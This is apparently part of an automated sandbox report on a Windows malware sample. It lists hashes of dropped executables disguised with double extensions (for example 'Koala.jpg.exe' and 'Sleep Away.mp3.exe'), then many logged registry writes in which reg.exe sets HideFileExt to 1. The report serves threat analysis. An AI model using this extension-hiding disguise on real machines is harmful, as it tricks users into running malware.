SHA512 ecf28cba3a9cf387e7faf90942e4122c44f812ea1baee8290e11067e2d7939ea683f5ace5d9a53af2f4c01d003d31fb25640f2134b0d8302fcaced1e94938531

C:\Users\Admin\AppData\Local\Temp\WwoW.exe

MD5 9c74646e762b43ee65f2328680047a00
SHA1 2b14d69dadaa67e6a2f3678c79cd68191dfcf46b
SHA256 463a5018a11533d6afc488c8a270adbbeaf1493356e27f6707bed8bf7a6de46c
SHA512 1d5b64990c4b007e836d21dd1adae47dd42796faad9e8335fbdb206d12c958c60d83bf11e522f7094484014c802eb94dc7a0725f6ac5572b9ce027a5bf8cf099

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.exe

MD5 5cd3f894a69a79a9ffa18c2804b42537
SHA1 26c0f6ad3e8a03e7b503ead74d362108160bf6d5
SHA256 4483b653552a384cec3ff7b3a9139d2ad3443c3a59e2dd5ee6bca29750770ec4
SHA512 db6db9af57a5e7eca3f2372f314b2d8eabf50958a807c4ff18ae1449e68895775e2d0feb8bb658efc1b72e9d294d943e38b5e5d78405e8ecb48ef1574d4e8256

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.exe

MD5 7b01ab3dcf86ae7b1361fa31b6baff84
SHA1 a1621d78aa4108471fca8061ef3c95d821c90692
SHA256 9b7131f6882fd8cce5f10e4c74a22de733c9978e206ab198c5155dd98de7fa93
SHA512 c829ffb76c2f8f0e3074d7876a1ee2b3207a48564a9c501ed47bc7ed3b432aa11a8af8b9a618ba70da7bb39413baf63e019c161a091fb317df4b3e41fd94b1e4

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.exe

MD5 b408ad93043f0274f2fb9a1bbb1db6b7
SHA1 372c0aa96cb2c93d9626d6ab1b7e02ae8047812f
SHA256 415ab158b830daced1de3d335d7884337c1a8ff00cffa6d2fd7064eccff3b8d1
SHA512 2bb476206f81b9a1b41656a4678416e97bdadae7d2c914c953a65b4507aef0b3987a16393d305d8974534f08fc70b883020dff86ef69967827d90d7707cfc0cd

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.exe

MD5 cd018e8b158d2489525ad4cbd6814d5a
SHA1 29c674342311305ffbc97e0b90e8b3799587d7eb
SHA256 d70209e7821edc8d84efb2aa1164db3beee0af4f68595d19266a05988758fc49
SHA512 d03e6d47bca64382e5c934c86aa3193e2f77e32bc7901097e039b162b788354baf38b18d1812caf060c2dc044cb1bdbf9015149bc1f733f128a21485e3129342

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.exe

MD5 539b955ba399dccad69f4e3091c4ee17
SHA1 e5a0f9734aecb4e25f5db956a283ce8f4bec2795
SHA256 f4993e80f1631e1568936d3f0e91e57eb96fb826e439ed4e497f18eef04e4687
SHA512 d739296abb3c1de787f092b2315287880d475a1d1e48ae04c2cd17b686b618030654ba488f9ce9d46d9e20ac26ab7242a499b9a3b43ce353e4614bc119025956

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.exe

MD5 82ff39e8f6199f8de3a62e638fdb55be
SHA1 e763b4125f8dfdfa694d2b627ecf07a39978789a
SHA256 98ac8532695e24b68cd0de05d506a5e107997929d5cbc37860068706fa3eee79
SHA512 8b4d91642b532d7c41e71b9ba8b2fbf4fac494ec9a74fd7ded92d50bc3f64ff7f52bf7fc8bb2b26e934fdfc7ce33530d5c4f3648371aa6fde002e36cabd0fb15

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.exe

MD5 04ba68479939a8b1be818de3ed7013a8
SHA1 e092966764a9c8fd9ac615729133bcfb3e887648
SHA256 5d9afc0f50f78420d9f92f21c776d98f15d5b20d301f57c2910a7eda6f17241a
SHA512 90ec3fa281b3abe701c36b11af8729427492bc84b11710a9919d523f33818b2cf705d7c8f2ec1df87050845afe386e6552bc35fd769b4ea773c9df0254b593ec

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.exe

MD5 5dc5077af44ed133cec1a2a02bd5e166
SHA1 5fb27b967044b3e97cac472161d1fb833fe696c0
SHA256 771767499a90b99a1cc84c3fda4ccc14184d74319e7660e29a184bede8fd27bf
SHA512 c4fc773be10bb74f72323f2bfe7216f4661c0906c0375dcff1771410387a3217d3e929256eaa36b44094aaa6eeb9f52fc68eec5b55708d0915b9c41f10fd6e65

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.exe

MD5 7534242ea1690ff7ba99c6f2a68cda37
SHA1 8aa6c834a651cb3fb3c360d51f48eba775e44b29
SHA256 93e95500120b31eb524823aac0f72b4b4faea164ae6c5cac4b5e3b8712a482ca
SHA512 019745881c86c9f5a2f32a1718f2d61b8cfb09144d901c62c62792fcd1094926ba1a420d859bb571a834cca595e43af9b85be3e4ddf972d8cc43803a213fd1a8

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.exe

MD5 c33fa91d3854943b06ac845421d52bb3
SHA1 e51d068826e30bdf02338b8ffac1931443e1e8d2
SHA256 8993f796b182bc106d19f2372e9dab1724e9fb5161a016f0c6fcd1c1e03b379d
SHA512 9c01604eab92d489f27e1e4fec65eda3926e144bf6dba5c0b59e4aa0b83c8286cef820746cde35e1e1baa9ba8faedd3a6d9a5ff62df47a89096193e14abbabcb

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.exe

MD5 7ecffc1008e2b72ffb722db9d8f238f8
SHA1 7530816cdd1b710eb1ea0bcbec4986e2158f03c7
SHA256 6d6650bce544252257d16f209acfaaa9f067ac8361d8f3f8311333befbeaf9c6
SHA512 d723cc58d6a8820cf71d2317f555ca90c0588a2ef72c1bbcf4a65dcb0bf86377a3d2042c924a2615e8fd4c84e7eb825f1e204ae4e38e08136ac636a969249b09

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.exe

MD5 d6fd049d83c8b853fcb2c2686f9e0b20
SHA1 06b82a4195fa25761f6a1cd77ac35fb2aa37c102
SHA256 59e13c0f604099ef00d35ec208acb0e80c4cdfb1fffa5e21ce1fa6848d436a36
SHA512 59dd9a10d89b65d38c3dec065e07ae93c42e21f2432960c25d206f40393e106ce3509f27a029fc0f4874cf63e2dc9af44635ce3b34b792664e5a2e13fe3e3057

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.exe

MD5 46e0489384dcf5537e18c3be3faeacc7
SHA1 d96d35b3f09aebf5a44aeee3e94c4070bde3cc80
SHA256 d5852a5aa56faf97157cf79f7971bcac15e028f9cb520b933d67b79bb700ca35
SHA512 99dcab3e87c0b346c01e7865c10d9d890d125cfd00a4a5bc1c7121b55346f69cde0f1399968683a37ea6f6d51fbddcc224a49702e90b7f7b507132f5a7c8219f

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.exe

MD5 7a1d4f7d6b4671171d8c02021c4a5187
SHA1 4de77d8a12959f90dea9393d8113c4f7347f9b03
SHA256 84e19ffc862d1e242f6772ab1e3d34309ffa1019db6332d5d69d527774aa5dd8
SHA512 bfd7a2bcbddbbb3657d29a376397c7768c9bcc269d1d03bd3470289b7b295ac6800d37811f9679b89cc81a53f6a3b04cb38ab8e078c9dbee31fb6e1dd334a84d

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.exe

MD5 97967b2b92525aff47bc5bf76f57443c
SHA1 1c35c4361396ed9c9d459618342c9b056f075678
SHA256 03e7004568c3c7ae5d9bce75bf4da28e465142b5bf8e76603637cd1e1a079458
SHA512 b277ba9acd9afba213eb3ea348e489fd06f0cd28e4dea1e0f1dee9c94480516405e8a72c3f87a11fa70f1517a4a24a97652dcc7a7e60ba07aab7883b3a83ae22

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.exe

MD5 2df9912442c54dbc78cbf7b5c39e2c82
SHA1 99bb04f195b6497dc42028ec51c457258608258c
SHA256 270a42eb859ea50c0c70c6d83808d492c4cfcdc54b07974843fbc234ed63f204
SHA512 d9807a893da11f66ce18c6928f59d08af6d5e551d2b7def49a0adaac8a0d846d00322e7290b889fe6c0f3b455ced07423379e5eb8092eb4ebee60f6262fefb5e

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.exe

MD5 e255d53cbd30968288c0547da9a1db8c
SHA1 43f4bf69e93042cca26fabad1c221ed706013837
SHA256 dc47e43a005339add12be4d81c8f3429b076688e7b620a8806a827d142c21263
SHA512 461ae4950c7e4cbd7803455b0b04bf90f0190c399e370e5d44f4ed8e986332e367a0b71efff29d5f69c3ff2a12432671a6f250ac0058943cae3f6f647584cedd

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.exe

MD5 78380d3ebbf34fa3c3b60ce5a623dfca
SHA1 2bde7a5c49744c372daa4e15fdb3e54f4e513760
SHA256 0f1806d5d1bd37f31a75f14f1fb87e46e28e63cf848e4d668ecfa4077b497309
SHA512 dd49190fa3466860ec4d055ad61737b0542f2fc45791b43fe178d6e61e675f909c9ad99b3dc91f2f51582c689df554cc958ecfc37b0a5e6c9035320cf35a3b5d

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.exe

MD5 6fa2fa2620f024dd7e227945ca231345
SHA1 81b3ec3bd15b7ecfe267d0703acf9652083e1985
SHA256 7c06760d0a9da3ebd6117b526e1b894352a8f72f16cb591ee231bc76176e01df
SHA512 3c730b88d802dec47541c367c05842f0794f16f700790f803134eececf784be4b025113844bb3043abedbd93535eb857a917896514ee0ceb913872e8850d9639

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.exe

MD5 13a083bd29c5b1271af4c3f8887644e8
SHA1 5fe635c6babc855e8a529674540e5ffe2ceca2bf
SHA256 0dde58ae583942a921e7dbe5c1fc70c415f7b425b8930acc7c3da90d1df5701a
SHA512 ec02523f373fdf5e1c4918e81e3529d167ce9adba1e83d123321526c21c00ebd9eb4962f75e786f79852b4d6b9e2ee558bdc248dd867bec37d6123c5b0b15ea4

C:\Users\Admin\AppData\Local\Temp\TYkE.exe

MD5 8dbb93935ce53e1dc8b88b4141239a9a
SHA1 4e94518e064befddb0a07b87fba67ed2f802db10
SHA256 3af382727b7fba97d26c1b9987e28b13af8322205af63371bc8ea4aeb04d7d76
SHA512 5e17d601183fa763bc2b196526ece886590ca08f38e711e516f1020bf582841bd73b763f924a140be175697dcc425d3c147e3f7f9412d3edafaa30bd200ac109

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.exe

MD5 7b12769f860eb6a9ca7a950758c4e96c
SHA1 b78ab33015952ae3c5110eb978c14d611881d54e
SHA256 4deb181dc40a5bfdc373b94ac03a61585794d7872d2145548a9f620c4fc2b8bc
SHA512 3c83eb803e594d4dc0ebf5f0f6cdcd6732c20f1f7a9244d9074a747798b45da07349f8fd116ba59789b70a333303b3f1390ebfea377b4bef956a18a6ee8239ae

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.exe

MD5 b1ec4aa95483c1de2450e93e0e76c4bc
SHA1 c66d411adbbf5123adadfee1c3032033fe6958d9
SHA256 28346b728313eb5083ce677ada627a31f89872c70c604b86a281200eede424e5
SHA512 14c9c83f55c2b92510bd66df6186703f15e8fbedfe105e8086bbb4b32c349ca5297aef70bf255d589263853b5ec5b0999b0f1382fe578607906bc52811730493

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.exe

MD5 76bab3b98869eb9831b19474076fedc9
SHA1 fdca5f16f456a104c62a3e6d165b09dc6507c719
SHA256 5c4a91bbaf02bba3b62ed71346813bc685bebc0add40653de5860d3ff3d4a40c
SHA512 79669749e3383ec72473b7e31906feb432e12c38cdb26f702a4775c0d2b968821becda4e817659c0e2052ab03da5837bf163e48a17e6b9e518ee47eaca1b23bf

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.exe

MD5 20bfe76016a44c9f882bd4f6fb2f0ecd
SHA1 41a2a75f41e924d111f5e970fefe161e54ea796f
SHA256 9575f8fa80a5bc0b486bc74bf859d7c8e03585bc4832c6f4716ded358445a14f
SHA512 895b90fc5e921f865add9c484459325b7a169a5f9667fce49065759ff221f337bb424dbfe8fe026a08acf9591659a2b21946d64871361b6b174964ccac83f1aa

C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.exe

MD5 880549c082af03da1a6cada20eb9b7f0
SHA1 3d9f6d8eea839d1c2bde48aeff10fe3f4f2aef6c
SHA256 96f7cf9e77470ac179effb910dd9391940d7e4379f2da092e68fea7fd12bdac0
SHA512 1b3c230723288ddc2461e64ba9386e8be393f04724b8fcf94cc2acd0ed71481cc1a9ba19046fe1f14dfea57f1eb73f538f53a9e1b29155e63f526235d4c86a5e

C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe

MD5 bea1f92f28cdce6a5c9a9e99e6128db8
SHA1 da08d1d063b8a1598b26a7b97f492bffda880f27
SHA256 52825b2aa12fec3a7d55876d164f5ce6853d5194b0f48c1e0ed6d4e87eb0ed7c
SHA512 a30ff38c40c35f2560969a0fab89a05b53fe3a97857c71e881a2ac20a360b33e3842cb908f6d5701bc6fe8079c9b92fa8d2dc354f8d89f8a477edf828c9e7fd2

C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.exe

MD5 af4ec6afe4df48c3276724d106104aac
SHA1 73befdffd1c810f4484c85c1d4af7f56adc864a8
SHA256 edf68d00db66b74ae2f18a28ba87fc78e6aebe7a9ef3049c9a18964e9c86313e
SHA512 3886f176b1a839c13188d4ad4364e41917e2d22fb41953872aabaae29f8e0b51872b10ab4f6e232dbd092865a2e5026fdc63c886b67ae32c6f32a76d9ee46361

C:\Users\Public\Music\Sample Music\Sleep Away.mp3.exe

MD5 66a2eed9eeec81467892a2a2b8b68676
SHA1 1921c49a3e4dde616bb2fdfbaff4bc39c2a33f1a
SHA256 067f9caac8ede91f1a49c7ff7eb67e3347b8e1af9e177b3476152dcca162fa38
SHA512 5a5249c8dfcfb5c7f81efa90dbd820dea6d10700640fb18d636708f63627481adf0f2ee9fd0ce471c64b6623b3892bb6a335721f46dc1b5fb00ee2ecddd10987

C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.exe

MD5 661869c0424d353afdcffad8727afc30
SHA1 c9d621c59c2c952c39cc77c4a47be31d79bec367
SHA256 0cd4d48c660681aacb9c3155e2a543fc6a17d78eab7a6c42c3b61abbf9d24645
SHA512 3434ab86d176cf66ddd97643719418bf530ebf75b024bb07d864b9ebf6cf624a9789f72a5a1bf6138ef6b5892b549a93e4f91445aa350f52de04f2637713db83

C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.exe

MD5 9b19f2fe86b16b1b73c4d1377306290f
SHA1 8c94cc70442c9e38aaf09d6ee29fdfcd1661a9d8
SHA256 e66d13f8f0c4f571c722aadf4dd4972eac7bd97bbf64e6ad4d17a01e22b0b846
SHA512 6613cd7518bb4f3eee7c41aaf82f63d06597bab836f6c2940a7e8873f482ece4db8f62492d2d2525172e6d2f62a1cc7f7151903fc644a33ae14bccf51605d56b

C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.exe

MD5 cee7e2fe4aac86aa2c9c4345afedd811
SHA1 cc14b86eb02c80f262ef03640ea2ea0969db33b1
SHA256 155988e75517ae2ab28ae7cd5f4065a287cc11fcafd4825345ef46727f680dde
SHA512 2e5d6185c7d4afb5d4a239e31d31ecc886ae773fd71516613fbafd91f32da41b6c94f8a1e2e2aac34a7df2f42c2c3b5a53d87acd2b2e06ba9af21f4021b7c7e0

C:\Users\Admin\AppData\Local\Temp\wEUu.exe

MD5 d187bd2c3b3235ef733f45e9ebbb09d9
SHA1 6d7269c9b062ac65dc2b2c4a9b6fd380899d3928
SHA256 958500ce1c0eb97665f4664140e82047354188f5066d907f501dd0f8c99a9dfd
SHA512 b77025edb71e588a176adc737daf43b39e96cc62d7f7c59c5d57f0a9f9b4b32af536ffdebbc8dd94d0687de3808d51d70c32db4e143500c13c69978c6fe86d01

memory/2900-2656-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1800-2663-0x0000000000400000-0x0000000000432000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-06 00:10

Reported

2024-11-06 00:12

Platform

win10v2004-20241007-en

Max time kernel

120s

Max time network

107s

Command Line

"C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
